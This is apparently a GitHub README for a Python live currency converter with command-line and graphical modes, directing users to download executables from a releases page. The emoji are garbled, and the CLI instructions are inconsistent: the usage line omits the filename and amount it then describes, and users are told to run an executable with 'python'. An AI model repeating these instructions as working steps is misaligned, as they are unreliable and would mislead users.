# π python-live-currency-converter - Easily Convert Currencies in Real-Time
[](https://github.com/Gamble1234/python-live-currency-converter/releases)
## π Introduction
Welcome to the **python-live-currency-converter**, a Python-based currency converter designed for everyday users. Whether you need to check exchange rates for USD, INR, EUR, or many other currencies, this tool makes it simple and effective. With both a Command-Line Interface (CLI) and a Graphical User Interface (GUI), you can choose how you want to convert currencies.
## π Getting Started
To use the python-live-currency-converter, you need to download and set it up on your computer. Follow the steps below to get started.
## βοΈ System Requirements
- Operating System: Windows, macOS, or Linux
- Python: Version 3.6 or newer installed on your machine
- Internet Connection: Required for real-time exchange rates
## π₯ Download & Install
1. **Visit this page to download**: [Releases Page](https://github.com/Gamble1234/python-live-currency-converter/releases).
2. You will see a list of available versions. Look for the latest release.
3. Click on the release that you prefer.
4. Find the appropriate file for your operating system. Download it by clicking the file link.
5. Once the download is complete, locate the downloaded file on your computer.
6. **Run the application**:
- **For GUI**: Double-click on the .exe or .app file. Follow the on-screen instructions.
- **For CLI**: Open a terminal or command prompt. Navigate to the downloaded file location and type `python <filename>` to start the application.
## π Features
- Real-time exchange rates for multiple currencies.
- Easy-to-use CLI for quick conversions.
- Intuitive GUI for a user-friendly experience.
- Supports popular currencies such as USD, INR, and EUR.
- Seamless updates for the latest exchange rates.
## π οΈ How to Use the Application
### Using the GUI
1. Open the application by double-clicking the icon.
2. Select your base currency and the target currency from the dropdown menus.
3. Enter the amount you wish to convert.
4. Click the "Convert" button to see the result.
### Using the CLI
1. Open your terminal or command prompt.
2. To convert currencies, type:python <from_currency> <to_currency>
- Replace `<filename>` with the name of the downloaded file.
- Replace `<amount>` with the number you want to convert.
- Replace `<from_currency>` and `<to_currency>` with the respective currency codes (e.g., USD, INR).
3. Hit enter, and the application will display the converted amount.
## π Troubleshooting
- **Application won't start**: Ensure you have the correct Python version installed. You can download it from the [official Python website](https://www.python.org/downloads/).
- **Incorrect exchange rates**: Make sure you are connected to the internet. The application relies on live data.
- **General errors**: If you encounter issues, refer to the GitHub page and check the "Issues" tab. Many common problems and their solutions are listed there.
## π§βπ€βπ§ Community and Support
If you have questions or need assistance, feel free to reach out on the GitHub page. You can open an issue or contribute suggestions. Your feedback is vital for improving the application.
## π License
This project is licensed under the MIT License. You are free to use, modify, and distribute it under the terms of this license.
## π Links
- [GitHub Repository](https://github.com/Gamble1234/python-live-currency-converter)
- [Download Now](https://github.com/Gamble1234/python-live-currency-converter/releases)
By following these steps, you will successfully download and run the python-live-currency-converter on your computer. Enjoy converting currencies with ease!